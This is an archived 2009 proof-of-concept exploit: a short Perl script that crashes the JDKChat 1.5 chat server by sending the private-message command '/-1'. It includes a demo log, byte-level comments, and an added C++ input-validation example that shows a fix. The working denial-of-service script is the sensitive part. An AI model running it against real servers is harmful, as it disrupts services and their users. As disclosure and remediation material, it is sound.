JDKChat 1.5 Remote Integer Overflow PoC
Source: http://www.zeroscience.org/ Author: LiquidWorm Published: 2009-03-13
#!/usr/bin/perl
#
# Title: JDKChat v1.5 Remote Integer Overflow PoC
#
# Summary: JDKChat is a simple C++ chat server for GNU/Linux systems.
# Users can connect to it through a simple tcp client like telnet.
#
# WebSite : http://www.jdkoftinoff.com/
#
# ---------------------------- Demo ---------------------------------
# aleks@tux ~ $ telnet 192.168.0.1 7777
# Trying 192.168.0.1...
# Connected to 192.168.0.1.
# Escape character is '^]'.
# Welcome To jdkchat v1.5 by J.D. Koftinoff Software, Ltd.
# http://www.jdkoftinoff.com/
# and modified by Aditya Godbole (urwithaditya@gmx.net)
# Commands available:
#    /who  --  (list all users along with their connection numbers)
#    /exit  -- (exit chat room)
#    /local -- (toggle local mode for your telnet session)
#    /[connection number] message -- (send private message to user at
#                                     specified connection number)
#
#
#    JDKCHAT: Aleks just entered the room.
#    JDKCHAT: Users = Aleks:0
# Aleks >
#
#
# // And after we run the PoC :
#
#    JDKCHAT: PwNzOr just entered the room.
# Aleks >Connection closed by foreign host.
# aleks@tux ~ $
#
# ---------------------------- /Demo --------------------------------
#
#
# Vulnerability discovered by n3tpr0b3 & LiquidWorm
#
# n3tpr0b3 [AT] gmail [.] com
#
# 12.03.2009
#

use IO::Socket;

if ($#ARGV != 1) {
print "
       JDKChat v1.5 Remote Integer Overflow PoC By n3tpr0b3
       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
       #        Usage : jdkchat_poc.pl SrvIP SrvPort      #
       #               Greetz to LiquidWorm               #
       =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n";
exit;
}

my $dupsa = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp"
)
or die "Could not connect to $ARGV[0]: $!\n";

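sleep 1;
# These bytes are the ASCII string "PwNzOr" followed by CR: the nickname
# that appears in the demo above as "PwNzOr just entered the room".
print $dupsa "\x50\x77\x4e\x7a\x4f\x72\x0d";
print "#--> Loged on t3h JDKChat server...\n";
sleep 1;
print "#--> Sending our evil command...   \n";
sleep 2;
# These bytes are "/-1" followed by CR: the private-message command
# (/[connection number] message) with connection number -1 and no message.
print $dupsa "\x2f\x2d\x31\x0d";
close($dupsa);
# Printed unconditionally; the script does not check the server's state.
print "#--> Server pwned...               \n";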
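
The demo shows the server dropping its clients after a private-message command whose connection number is -1. The following is an added example, not JDKChat's code and not from the PoC authors: one way a server can validate that field before using it as a connection index. `parse_private_target` and `max_connections` are hypothetical names, and a fixed-size connection table is an assumption.

```cpp
#include <cstddef>
#include <iostream>
#include <limits>
#include <string>

// Hypothetical helper: parse "/<connection number> message" and write the
// target slot to slot_out only if it is plain decimal and < max_connections.
bool parse_private_target(const std::string& raw, std::size_t max_connections,
                          std::size_t& slot_out) {
    std::size_t len = raw.size();
    // Strip the telnet line terminator (CR and/or LF).
    while (len > 0 && (raw[len - 1] == '\r' || raw[len - 1] == '\n')) --len;
    if (len < 2 || raw[0] != '/') return false;

    const std::size_t kMax = std::numeric_limits<std::size_t>::max();
    std::size_t value = 0;
    std::size_t i = 1;
    for (; i < len && raw[i] != ' '; ++i) {
        // Digits only: a sign ('-' or '+') or a letter is rejected outright,
        // so "/-1" never reaches a signed-to-unsigned conversion.
        if (raw[i] < '0' || raw[i] > '9') return false;
        std::size_t digit = static_cast<std::size_t>(raw[i] - '0');
        // Refuse to wrap: check before multiplying, not after.
        if (value > (kMax - digit) / 10) return false;
        value = value * 10 + digit;
        // Bounds check against the table size before the value is used.
        if (value >= max_connections) return false;
    }
    if (i == 1) return false;  // "/" followed by no digits
    slot_out = value;
    return true;
}

int main() {
    // Constructed sample lines, including the PoC's "/-1\r".
    const char* samples[] = {"/0 hello\r", "/-1\r", "/16 hi\r", "/who\r",
                             "/99999999999999999999999 x\r"};
    for (const char* s : samples) {
        std::size_t slot = 0;
        bool ok = parse_private_target(s, 16, slot);
        std::cout << (ok ? "accept slot " + std::to_string(slot)
                         : std::string("reject")) << '\n';
    }
    return 0;
}
```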

 